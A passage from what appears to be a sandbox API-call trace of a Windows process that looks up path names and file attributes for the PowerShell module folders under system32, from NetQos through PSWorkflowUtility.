"c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3a [0332.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", nBufferLength=0x3a, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos", lpFilePart=0x0) returned 0x39 [0332.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.113] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe51fae, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3f [0332.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", nBufferLength=0x3f, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity", lpFilePart=0x0) returned 0x3e [0332.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.114] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0332.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0332.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", nBufferLength=0x41, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam", lpFilePart=0x0) returned 0x40 [0332.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.114] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe77f21, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3c [0332.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x3c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b [0332.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.115] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe9f62b, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0332.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", nBufferLength=0x4d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus", lpFilePart=0x0) returned 0x4c [0332.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.115] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbe9f62b, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x48 [0332.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", nBufferLength=0x48, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager", lpFilePart=0x0) returned 0x47 [0332.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.115] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkswitchmanager"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0332.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", nBufferLength=0x45, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition", lpFilePart=0x0) returned 0x44 [0332.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.116] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networktransition"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbfcfdb9, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0332.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0332.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice", nBufferLength=0x3e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice", lpFilePart=0x0) returned 0x3d [0332.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.116] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pcsvdevice"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbfcfdb9, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PersistentMemory", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0332.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PersistentMemory", nBufferLength=0x44, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PersistentMemory", lpFilePart=0x0) returned 0x43 [0332.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.117] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PersistentMemory" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\persistentmemory"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0332.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI", nBufferLength=0x37, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI", lpFilePart=0x0) returned 0x36 [0332.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.117] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PKI" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pki"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0332.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice", nBufferLength=0x3d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice", lpFilePart=0x0) returned 0x3c [0332.117] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.117] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pnpdevice"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcbfcfdb9, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x43 [0332.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement", nBufferLength=0x43, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement", lpFilePart=0x0) returned 0x42 [0332.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.118] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PrintManagement" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\printmanagement"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcc02299f, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0332.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ProcessMitigations", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x46 [0332.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ProcessMitigations", nBufferLength=0x46, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ProcessMitigations", lpFilePart=0x0) returned 0x45 [0332.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.118] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ProcessMitigations" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\processmitigations"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Provisioning", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0332.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Provisioning", nBufferLength=0x40, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Provisioning", lpFilePart=0x0) returned 0x3f [0332.119] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.119] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Provisioning" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\provisioning"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0x40134965, ftLastWriteTime.dwHighDateTime=0x1d61756, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0332.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x4f, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) returned 0x4e [0332.119] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.119] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0332.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x41 [0332.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", nBufferLength=0x41, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics", lpFilePart=0x0) returned 0x40 [0332.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.120] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDiagnostics" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdiagnostics"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xbe25506, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0332.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", nBufferLength=0x42, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob", lpFilePart=0x0) returned 0x41 [0332.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.120] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcc090661, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0332.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow", nBufferLength=0x3e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow", lpFilePart=0x0) returned 0x3d [0332.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.120] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflow" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflow"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, ftLastWriteTime.dwLowDateTime=0xcc090661, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0332.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e378) returned 1 [0332.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0332.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility", nBufferLength=0x45, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility", lpFilePart=0x0) returned 0x44 [0332.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e3c8) returned 1 [0332.121] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflowutility"), fInfoLevelId=0x0, lpFileInformation=0x1b62e6f0 | out: lpFileInformation=0x1b62e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x83d0f209, ftLastAccessTime.dwHighDateTime=0x1d94217, 